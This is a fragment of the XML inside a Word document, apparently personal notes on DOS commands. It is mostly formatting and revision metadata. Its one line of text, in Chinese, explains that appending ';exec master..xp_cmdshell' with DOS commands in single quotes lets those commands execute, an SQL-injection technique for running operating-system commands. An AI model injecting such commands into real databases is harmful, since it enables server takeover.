        <w:t>;exec</w:t>
      </w:r>
      <w:r w:rsidR="00B528F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A6313">
        <w:t>master..xp_cmdshell 后加上</w:t>
      </w:r>
      <w:r w:rsidR="00287815">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
      <w:r w:rsidR="007A6313">
        <w:t>引号和</w:t>
      </w:r>
      <w:r w:rsidR="00287815">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
      <w:r w:rsidR="007A6313">
        <w:t>引号内写入一些 DOS 命令就都可以执行了</w:t>
      </w:r>
      <w:r w:rsidR="00105426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007A6313" w:rsidRPr="00F672ED" w:rsidSect="004242EE">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287"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="483A4EA8"/>
    <w:lvl w:ilvl="0" w:tplc="16E6CB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F0483B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0374B5D2"/>
    <w:lvl w:ilvl="0" w:tplc="5B427C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C5"/>
    <w:rsid w:val="00050927"/>
    <w:rsid w:val="000C123F"/>
    <w:rsid w:val="000E2C00"/>
    <w:rsid w:val="00103DCE"/>
    <w:rsid w:val="00105426"/>
    <w:rsid w:val="00153390"/>
    <w:rsid w:val="001651E2"/>
    <w:rsid w:val="00171CCC"/>
    <w:rsid w:val="001C77C5"/>
    <w:rsid w:val="00202A10"/>
    <w:rsid w:val="00206CDE"/>
    <w:rsid w:val="00263271"/>
    <w:rsid w:val="00287815"/>
    <w:rsid w:val="002B1E32"/>
    <w:rsid w:val="002B6FB8"/>
    <w:rsid w:val="003225BB"/>
    <w:rsid w:val="003410C3"/>
    <w:rsid w:val="003873AA"/>
    <w:rsid w:val="003B03C7"/>
    <w:rsid w:val="003C1CBB"/>
    <w:rsid w:val="003D28F3"/>
    <w:rsid w:val="003E1E9A"/>
    <w:rsid w:val="003E4C93"/>
    <w:rsid w:val="004242EE"/>
    <w:rsid w:val="004406DB"/>
    <w:rsid w:val="00470697"/>
    <w:rsid w:val="004F5BC6"/>
    <w:rsid w:val="0054189A"/>
    <w:rsid w:val="00547EFF"/>
    <w:rsid w:val="00564DA4"/>
    <w:rsid w:val="00580398"/>
    <w:rsid w:val="0059477D"/>
    <w:rsid w:val="005B0114"/>
    <w:rsid w:val="005B5CF4"/>
    <w:rsid w:val="005B75F2"/>
    <w:rsid w:val="005D7CCE"/>
    <w:rsid w:val="005E36CC"/>
    <w:rsid w:val="00633B09"/>
    <w:rsid w:val="006760D9"/>
    <w:rsid w:val="00695BF5"/>
    <w:rsid w:val="006979AC"/>
    <w:rsid w:val="006A0791"/>
    <w:rsid w:val="006A7851"/>
    <w:rsid w:val="006B1986"/>
    <w:rsid w:val="006C6B2A"/>
    <w:rsid w:val="0070344A"/>
    <w:rsid w:val="00703D28"/>
    <w:rsid w:val="00707E18"/>
    <w:rsid w:val="00713D3F"/>
    <w:rsid w:val="00735E73"/>
    <w:rsid w:val="00742046"/>
    <w:rsid w:val="00756524"/>
    <w:rsid w:val="00766006"/>
    <w:rsid w:val="007A6313"/>
    <w:rsid w:val="007D77C1"/>
    <w:rsid w:val="007F2193"/>
    <w:rsid w:val="008154B2"/>
    <w:rsid w:val="00815E98"/>
    <w:rsid w:val="008547FD"/>
    <w:rsid w:val="008A1DCF"/>
    <w:rsid w:val="008B56AA"/>
    <w:rsid w:val="008E0B1C"/>
    <w:rsid w:val="008E517F"/>
    <w:rsid w:val="00905ED0"/>
    <w:rsid w:val="00907721"/>
    <w:rsid w:val="009745F9"/>
    <w:rsid w:val="00977B96"/>
    <w:rsid w:val="009A5974"/>
    <w:rsid w:val="009B43B3"/>
    <w:rsid w:val="009C6F7A"/>
    <w:rsid w:val="00A1255F"/>
    <w:rsid w:val="00A44B4A"/>
    <w:rsid w:val="00A45D27"/>
    <w:rsid w:val="00AC720A"/>
    <w:rsid w:val="00AE5367"/>
    <w:rsid w:val="00AE5FEB"/>
    <w:rsid w:val="00B0635A"/>
    <w:rsid w:val="00B528F4"/>
    <w:rsid w:val="00B548C9"/>
    <w:rsid w:val="00B80531"/>
    <w:rsid w:val="00BC2368"/>
    <w:rsid w:val="00BC2C8A"/>
    <w:rsid w:val="00BF50CB"/>
    <w:rsid w:val="00C32C38"/>
    <w:rsid w:val="00C645A4"/>
    <w:rsid w:val="00CA3E13"/>
    <w:rsid w:val="00CB17BE"/>
    <w:rsid w:val="00CD5D81"/>
    <w:rsid w:val="00CD7091"/>
    <w:rsid w:val="00CE46FD"/>
    <w:rsid w:val="00CF111F"/>
    <w:rsid w:val="00D61F8E"/>
    <w:rsid w:val="00D74744"/>
    <w:rsid w:val="00D93777"/>
    <w:rsid w:val="00DB72CA"/>
    <w:rsid w:val="00DD43F3"/>
    <w:rsid w:val="00E82B84"/>
    <w:rsid w:val="00F245FB"/>
    <w:rsid w:val="00F272AC"/>
    <w:rsid w:val="00F3737D"/>
    <w:rsid w:val="00F60947"/>
    <w:rsid w:val="00F672ED"/>
    <w:rsid w:val="00F96F9F"/>
    <w:rsid w:val="00F97E52"/>
    <w:rsid w:val="00FA58DE"/>
    <w:rsid w:val="00FB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7FC7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D0E9A2C1-5DCA-4BA1-9078-598B3878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F50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2EE"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00695BF5"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF50C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DOS%20command.doc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国阳</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李 国阳</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-07T12:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-08T14:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>